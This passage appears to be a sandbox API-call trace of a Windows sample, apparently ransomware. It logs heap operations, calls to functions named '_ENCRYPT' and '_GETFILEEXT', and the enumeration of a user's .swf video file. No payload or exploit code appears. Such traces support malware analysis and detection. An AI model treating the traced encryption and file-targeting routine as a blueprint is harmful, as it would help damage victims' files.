lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0198.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0198.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.439] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0198.439] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0198.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0198.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0198.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0198.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0198.440] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0198.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0198.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0198.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.441] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0198.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0198.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9ba408, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0198.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.445] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0198.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0198.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0198.446] CloseHandle (hObject=0x160) returned 1 [0198.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0198.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0198.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0198.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0198.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0198.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0198.446] FreeLibrary (hLibModule=0x75990000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0198.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0198.447] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0198.447] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0198.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0198.447] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0198.447] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0198.447] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.447] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0198.448] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0198.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0198.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0198.448] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.448] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.448] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.448] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xbdc7e7c0, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 0x90add8 [0198.448] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.449] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.449] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe109e7d0, ftCreationTime.dwHighDateTime=0x1d5e45a, ftLastAccessTime.dwLowDateTime=0xbdc7e7c0, ftLastAccessTime.dwHighDateTime=0x1d5e191, ftLastWriteTime.dwLowDateTime=0xbdc7e7c0, ftLastWriteTime.dwHighDateTime=0x1d5e191, nFileSizeHigh=0x0, nFileSizeLow=0x11e7e, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="tv3AVY6IGn_a.swf", cAlternateFileName="TV3AVY~1.SWF")) returned 0x90add8 [0198.449] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0198.449] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\GHIoo2t\\tv3AVY6IGn_a.swf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0198.450] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 